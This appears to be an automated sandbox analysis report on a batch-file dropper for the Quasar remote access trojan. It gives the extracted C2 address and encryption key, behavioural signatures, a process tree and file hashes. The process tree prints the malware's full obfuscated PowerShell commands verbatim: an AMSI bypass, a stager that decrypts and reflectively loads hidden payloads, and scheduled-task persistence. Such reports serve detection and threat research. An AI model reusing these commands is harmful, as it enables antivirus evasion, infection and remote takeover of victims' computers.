Analysis
-
max time kernel
150s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
14-05-2024 23:05
General
-
Target
Uni.bat
-
Size
515KB
-
MD5
4c2a3be3d5c9464eb441677e41f44fd8
-
SHA1
c826034a0882d21a39056d745e88622ee9698343
-
SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
-
SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
SSDEEP
12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
review-tops.gl.at.ply.gg:48212
Mutex
$Sxr-IGnkORFTlshRl7BdTw
Attributes
-
encryption_key
YDmRBA8wExjQkYgGrHhN
-
install_name
$sxr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f610c466-1cdb-44d8-ac78-96a59ac5c6e2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xYWPnApvtlMN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ejeZHfPWUCzVdi,[Parameter(Position=1)][Type]$WyWwJAQrdp)$lVpsDXekPeu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+'d'+''+'D'+'el'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+'A'+'u'+'to'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$lVpsDXekPeu.DefineConstructor('RT'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'lN'+[Char](97)+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$ejeZHfPWUCzVdi).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+'i'+'m'+'e'+[Char](44)+'Ma'+[Char](110)+''+'a'+''+'g'+'e'+'d'+'');$lVpsDXekPeu.DefineMethod('In'+[Char](118)+''+[Char](111)+'ke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+'al',$WyWwJAQrdp,$ejeZHfPWUCzVdi).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+'im'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+'na'+'g'+''+[Char](101)+''+'d'+'');Write-Output $lVpsDXekPeu.CreateType();}$qJJVmvCSPKspA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.d'+[Char](108)+'l')}).GetType('M'+'i'+'c'+'r'+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'saf'+'e'+'N'+'a'+''+[Char](116)+'i'+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$IngFYPEUJZAhbW=$qJJVmvCSPKspA.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+''+[Char](100)+'r'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+','+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KrGsmgXxsPyLJJCpYGo=xYWPnApvtlMN @([String])([IntPtr]);$ZgvtzZhrgNyKbnwLmAUHDw=xYWPnApvtlMN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jTkBzVGowsS=$qJJVmvCSPKspA.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'duleH'+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'el'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$PhXpTtfWEmopEr=$IngFYPEUJZAhbW.Invoke($Null,@([Object]$jTkBzVGowsS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'Lib'+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$yeuaDPNLvRuOMITWQ=$IngFYPEUJZAhbW.Invoke($Null,@([Object]$jTkBzVGowsS,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+'t')));$ODNmwNf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhXpTtfWEmopEr,$KrGsmgXxsPyLJJCpYGo).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$XcstCFFsEEHkcrJOG=$IngFYPEUJZAhbW.Invoke($Null,@([Object]$ODNmwNf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$JNrvvRloit=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yeuaDPNLvRuOMITWQ,$ZgvtzZhrgNyKbnwLmAUHDw).Invoke($XcstCFFsEEHkcrJOG,[uint32]8,4,[ref]$JNrvvRloit);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XcstCFFsEEHkcrJOG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yeuaDPNLvRuOMITWQ,$ZgvtzZhrgNyKbnwLmAUHDw).Invoke($XcstCFFsEEHkcrJOG,[uint32]8,0x20,[ref]$JNrvvRloit);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+'T'+''+[Char](87)+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_824_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_824.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_824.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_824.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_824.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_824.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 1d6db5c609bac241e8f9e62745351a98 qU9utc3bGkCwEnIWVWBSNg.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD59a139477d9ee60d618b1ef0bc33c58ed
SHA1e0681b251db814b394eafd784c1078a7b71c639f
SHA256c2a61e2ff43bc4e554991d486f4a8a44e000f41151ecaac81f44a656cb36bb15
SHA512fc94845a39f2c08af1d5cbe871897cc9ca53bc222f3732e8f9697639bfae84567d7730d2836ea10728707479eafc3ee23eb71896fd75c4117a8234f05886435e
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
330B
MD5a765dcd715f1014e2210460c207e2913
SHA1750e87a95eb568c3832200cec3a02225fc932e7e
SHA256a82e79cf14c39389e748e64c3cb7c0082e3f411350fa74241aefb707411abf8e
SHA5124853c7d9e60c16b0d2510c760467ddf91e4caba43ffc20a82d23e4c431b96d6840958e9b17fc6db620a6bcbf01be43382b0de7352fe3de7e58103ca8eca4061a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3430fwlv.agf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\startup_str_824.batFilesize
515KB
MD54c2a3be3d5c9464eb441677e41f44fd8
SHA1c826034a0882d21a39056d745e88622ee9698343
SHA25645e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
